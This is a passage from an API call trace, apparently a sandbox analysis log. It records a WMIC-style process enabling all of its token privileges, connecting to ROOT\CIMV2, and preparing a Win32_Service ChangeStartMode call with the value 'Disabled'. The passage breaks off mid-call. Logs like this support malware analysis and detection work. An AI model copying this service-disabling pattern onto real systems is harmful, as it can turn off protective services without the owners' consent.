pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.632] lstrlenW (lpString="ResumeService") returned 13 [0120.632] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ResumeService", cchCount2=13) returned 1 [0120.632] IUnknown:Release (This=0xd680a0) returned 0x1 [0120.632] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.632] IWbemClassObject:Get (in: This=0xd68608, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ResumeService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.632] lstrlenW (lpString="InterrogateService") returned 18 [0120.632] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="InterrogateService", cchCount2=18) returned 1 [0120.632] IUnknown:Release (This=0xd68608) returned 0x1 [0120.632] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.632] IWbemClassObject:Get (in: This=0xd69010, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="InterrogateService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.632] lstrlenW (lpString="UserControlService") returned 18 [0120.632] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="UserControlService", cchCount2=18) returned 1 [0120.632] IUnknown:Release (This=0xd69010) returned 0x1 [0120.632] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.632] IWbemClassObject:Get (in: This=0xd6d018, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="UserControlService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.632] lstrlenW (lpString="Create") returned 6 [0120.632] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.632] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Create", cchCount2=6) returned 1 [0120.632] IUnknown:Release (This=0xd6d018) returned 0x1 [0120.632] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.633] IWbemClassObject:Get (in: This=0xd70ce8, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Create", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] lstrlenW (lpString="Change") returned 6 [0120.633] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.633] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="Change", cchCount2=6) returned 3 [0120.633] IUnknown:Release (This=0xd70ce8) returned 0x1 [0120.633] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91ee78, pv=0x91eeac | out: pv=0x91eeac) returned 0x0 [0120.633] IWbemClassObject:Get (in: This=0xd71970, wszName="Name", lFlags=0, pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Change", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.633] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.633] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ChangeStartMode", cchCount1=15, lpString2="ChangeStartMode", cchCount2=15) returned 2 [0120.633] GetCurrentThreadId () returned 0xc4c [0120.633] ??0CHString@@QAE@XZ () returned 0x91ecc4 [0120.633] IWbemClassObject:Get (in: This=0xd71970, wszName="Description", lFlags=0, pVal=0x91ec94*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec94*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ChangeStartMode method modifies the StartMode of a service. It returns an integer value of 0 if the service was successfully modified, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.633] IWbemClassObject:Get (in: This=0xd71970, wszName="Parameters", lFlags=0, pVal=0x91ee38*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ee38*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fdc0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xd436d8, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] IWbemClassObject:Get (in: This=0xd71970, wszName="VerbType", lFlags=0, pVal=0x91edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91edd0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] IWbemClassObject:Get (in: This=0xd71970, wszName="Derivation", lFlags=0, pVal=0x91edb8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91edb8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.633] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.634] lstrlenW (lpString="ChangeStartMode") returned 15 [0120.634] SafeArrayGetLBound (in: psa=0xd4fdc0, nDim=0x1, plLbound=0x91ee6c | out: plLbound=0x91ee6c) returned 0x0 [0120.634] SafeArrayGetUBound (in: psa=0xd4fdc0, nDim=0x1, plUbound=0x91ee88 | out: plUbound=0x91ee88) returned 0x0 [0120.634] SafeArrayGetElement (in: psa=0xd4fdc0, rgIndices=0x91ee8c, pv=0x91ee98 | out: pv=0x91ee98) returned 0x0 [0120.634] IWbemClassObject:Get (in: This=0xd72a08, wszName="ParaId", lFlags=0, pVal=0x91ede8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ede8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.634] IWbemClassObject:Get (in: This=0xd72a08, wszName="Type", lFlags=0, pVal=0x91ed80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ed80*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.634] IWbemClassObject:Get (in: This=0xd72a08, wszName="Default", lFlags=0, pVal=0x91eda0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91eda0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.634] GetCurrentThreadId () returned 0xc4c [0120.634] ??0CHString@@QAE@XZ () returned 0x91ecd4 [0120.634] IWbemClassObject:Get (in: This=0xd72a08, wszName="Qualifiers", lFlags=0, pVal=0x91ec5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec5c*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fac0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xd43688, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.634] SafeArrayGetLBound (in: psa=0xd4fac0, nDim=0x1, plLbound=0x91ec8c | out: plLbound=0x91ec8c) returned 0x0 [0120.634] SafeArrayGetUBound (in: psa=0xd4fac0, nDim=0x1, plUbound=0x91eca0 | out: plUbound=0x91eca0) returned 0x0 [0120.634] SafeArrayGetElement (in: psa=0xd4fac0, rgIndices=0x91ecac, pv=0x91eccc | out: pv=0x91eccc) returned 0x0 [0120.634] IWbemClassObject:Get (in: This=0xd72cc0, wszName="Name", lFlags=0, pVal=0x91ec74*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.634] IWbemClassObject:Get (in: This=0xd72cc0, wszName="QualifierValue", lFlags=0, pVal=0x91ec4c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec4c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fd60*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xd43718, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.635] SafeArrayGetLBound (in: psa=0xd4fd60, nDim=0x1, plLbound=0x91ec90 | out: plLbound=0x91ec90) returned 0x0 [0120.635] SafeArrayGetUBound (in: psa=0xd4fd60, nDim=0x1, plUbound=0x91ec70 | out: plUbound=0x91ec70) returned 0x0 [0120.635] lstrlenW (lpString="CIMTYPE") returned 7 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0120.635] lstrlenW (lpString="read") returned 4 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0120.635] lstrlenW (lpString="write") returned 5 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0120.635] SafeArrayGetElement (in: psa=0xd4fd60, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.635] lstrlenW (lpString="true") returned 4 [0120.635] lstrlenW (lpString="True") returned 4 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0120.635] IUnknown:Release (This=0xd72cc0) returned 0x1 [0120.635] SafeArrayGetElement (in: psa=0xd4fac0, rgIndices=0x91ecac, pv=0x91eccc | out: pv=0x91eccc) returned 0x0 [0120.635] IWbemClassObject:Get (in: This=0xd72ff8, wszName="Name", lFlags=0, pVal=0x91ec74*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd42324, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.635] IWbemClassObject:Get (in: This=0xd72ff8, wszName="QualifierValue", lFlags=0, pVal=0x91ec4c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4fd60, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x91ec4c*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xd4faf0*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xd42788, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0120.635] SafeArrayGetLBound (in: psa=0xd4faf0, nDim=0x1, plLbound=0x91ec90 | out: plLbound=0x91ec90) returned 0x0 [0120.635] SafeArrayGetUBound (in: psa=0xd4faf0, nDim=0x1, plUbound=0x91ec70 | out: plUbound=0x91ec70) returned 0x0 [0120.635] lstrlenW (lpString="CIMTYPE") returned 7 [0120.635] lstrlenW (lpString="ValueMap") returned 8 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0120.635] lstrlenW (lpString="read") returned 4 [0120.635] lstrlenW (lpString="ValueMap") returned 8 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0120.635] lstrlenW (lpString="write") returned 5 [0120.635] lstrlenW (lpString="ValueMap") returned 8 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0120.635] lstrlenW (lpString="In") returned 2 [0120.635] lstrlenW (lpString="ValueMap") returned 8 [0120.635] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0120.635] lstrlenW (lpString="Out") returned 3 [0120.635] lstrlenW (lpString="ValueMap") returned 8 [0120.636] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0120.636] SafeArrayGetElement (in: psa=0xd4faf0, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.636] SafeArrayGetElement (in: psa=0xd4faf0, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.636] SafeArrayGetElement (in: psa=0xd4faf0, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.636] SafeArrayGetElement (in: psa=0xd4faf0, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.636] SafeArrayGetElement (in: psa=0xd4faf0, rgIndices=0x91ecb8, pv=0x91ecc0 | out: pv=0x91ecc0) returned 0x0 [0120.636] SysStringLen (param_1="ValueMap") returned 0x8 [0120.636] SysStringLen (param_1="In") returned 0x2 [0120.636] SysStringLen (param_1="In") returned 0x2 [0120.636] SysStringLen (param_1="ValueMap") returned 0x8 [0120.636] IUnknown:Release (This=0xd72ff8) returned 0x1 [0120.636] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.636] IUnknown:Release (This=0xd72a08) returned 0x1 [0120.636] IUnknown:Release (This=0xd71970) returned 0x1 [0120.636] IUnknown:Release (This=0xd65728) returned 0x0 [0120.637] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.637] lstrlenW (lpString="/") returned 1 [0120.637] lstrlenW (lpString="Disabled") returned 8 [0120.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0120.637] lstrlenW (lpString="-") returned 1 [0120.637] lstrlenW (lpString="Disabled") returned 8 [0120.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0120.637] lstrlenW (lpString="Disabled") returned 8 [0120.637] lstrlenW (lpString="Disabled") returned 8 [0120.637] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.637] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.637] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x37ef93d3 | out: _String="Select", _Context=0x37ef93d3) returned="Select" [0120.637] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef93d3 | out: _String=0x0, _Context=0x37ef93d3) returned="*" [0120.637] lstrlenW (lpString="FROM") returned 4 [0120.637] lstrlenW (lpString="*") returned 1 [0120.637] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef93d3 | out: _String=0x0, _Context=0x37ef93d3) returned="from" [0120.638] lstrlenW (lpString="FROM") returned 4 [0120.638] lstrlenW (lpString="from") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.638] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef93d3 | out: _String=0x0, _Context=0x37ef93d3) returned="Win32_Service" [0120.638] lstrlenW (lpString="SET") returned 3 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0120.638] lstrlenW (lpString="CREATE") returned 6 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0120.638] lstrlenW (lpString="GET") returned 3 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0120.638] lstrlenW (lpString="LIST") returned 4 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0120.638] lstrlenW (lpString="ASSOC") returned 5 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0120.638] WbemLocator:IUnknown:AddRef (This=0xd174f8) returned 0x3 [0120.638] lstrlenW (lpString="") returned 0 [0120.638] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0120.638] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.638] lstrlenW (lpString="LHNIWSJ") returned 7 [0120.638] GetCurrentThreadId () returned 0xc4c [0120.638] GetCurrentProcess () returned 0xffffffff [0120.638] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x91f7c4 | out: TokenHandle=0x91f7c4*=0x270) returned 1 [0120.638] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x91f7c0 | out: TokenInformation=0x0, ReturnLength=0x91f7c0) returned 0 [0120.638] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xcd9120, TokenInformationLength=0x118, ReturnLength=0x91f7c0 | out: TokenInformation=0xcd9120, ReturnLength=0x91f7c0) returned 1 [0120.638] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xcd9120*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.638] CloseHandle (hObject=0x270) returned 1 [0120.638] lstrlenW (lpString="GET") returned 3 [0120.638] lstrlenW (lpString="CALL") returned 4 [0120.638] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0120.639] lstrlenW (lpString="LIST") returned 4 [0120.639] lstrlenW (lpString="CALL") returned 4 [0120.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0120.639] lstrlenW (lpString="SET") returned 3 [0120.639] lstrlenW (lpString="CALL") returned 4 [0120.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0120.639] lstrlenW (lpString="CALL") returned 4 [0120.639] lstrlenW (lpString="CALL") returned 4 [0120.639] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0120.639] ??0CHString@@QAE@XZ () returned 0x91f784 [0120.639] GetCurrentThreadId () returned 0xc4c [0120.639] SysStringLen (param_1="\\\\") returned 0x2 [0120.639] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0120.639] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0120.639] SysStringLen (param_1="\\") returned 0x1 [0120.639] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0120.639] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0120.639] WbemLocator:IWbemLocator:ConnectServer (in: This=0xd174f8, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xd40c80) returned 0x0 [0120.645] CoSetProxyBlanket (pProxy=0xd40c80, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0120.645] ??1CHString@@QAE@XZ () returned 0x74a66430 [0120.645] ??0CHString@@QAE@XZ () returned 0x91f780 [0120.645] GetCurrentThreadId () returned 0xc4c [0120.645] lstrlenA (lpString="") returned 0 [0120.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xcd3b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0120.645] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.645] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0120.645] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x37ef927f | out: _String="Select", _Context=0x37ef927f) returned="Select" [0120.645] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef927f | out: _String=0x0, _Context=0x37ef927f) returned="*" [0120.645] lstrlenW (lpString="FROM") returned 4 [0120.645] lstrlenW (lpString="*") returned 1 [0120.645] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0120.645] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef927f | out: _String=0x0, _Context=0x37ef927f) returned="from" [0120.645] lstrlenW (lpString="FROM") returned 4 [0120.645] lstrlenW (lpString="from") returned 4 [0120.645] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0120.646] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x37ef927f | out: _String=0x0, _Context=0x37ef927f) returned="Win32_Service" [0120.646] IWbemServices:GetObject (in: This=0xd40c80, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x91f758*=0x0, ppCallResult=0x0 | out: ppObject=0x91f758*=0xd9c730, ppCallResult=0x0) returned 0x0 [0120.676] IWbemClassObject:GetMethod (in: This=0xd9c730, wszName="ChangeStartMode", lFlags=0, ppInSignature=0x91f764, ppOutSignature=0x91f750 | out: ppInSignature=0x91f764*=0xd9cc20, ppOutSignature=0x91f750*=0xd72b18) returned 0x0 [0120.677] IWbemClassObject:SpawnInstance (in: This=0xd9cc20, lFlags=0, ppNewInstance=0x91f770 | out: ppNewInstance=0x91f770*=0xd72d10) returned 0x0 [0120.677] IWbemClassObject:GetNames (in: This=0xd9cc20, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x91f774 | out: pNames=0x91f774*="\x01ƀ\x04") returned 0x0 [0120.677] SafeArrayGetLBound (in: psa=0xd4fa30, nDim=0x1, plLbound=0x91f720 | out: plLbound=0x91f720) returned 0x0 [0120.677] SafeArrayGetUBound (in: psa=0xd4fa30, nDim=0x1, plUbound=0x91f768 | out: plUbound=0x91f768) returned 0x0 [0120.677] SafeArrayGetElement (in: psa=0xd4fa30, rgIndices=0x91f75c, pv=0x91f784 | out: pv=0x91f784) returned 0x0 [0120.677] IWbemClassObject:GetPropertyQualifierSet (in: This=0xd72d10, wszProperty="StartMode", ppQualSet=0x91f644 | out: ppQualSet=0x91f644*=0xd4f4d0) returned 0x0 [0120.677] IWbemQualifierSet:Get (in: This=0xd4f4d0, wszName="CIMTYPE", lFlags=0, pVal=0x91f614*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x91f614*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0120.677] IWbemClassObject:Get (in: This=0xd72d10, wszName="StartMode", lFlags=0, pVal=0x91f5ec*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x91f628*=9565712, plFlavor=0x0 | out: pVal=0x91f5ec*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0x91f628*=8, plFlavor=0x0) returned 0x0 [0120.677] IWbemQualifierSet:Get (in: This=0xd4f4d0, wszName="read", lFlags=0, pVal=0x91f62c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x91f62c*(varType=0x0, wReserved1=0x0, 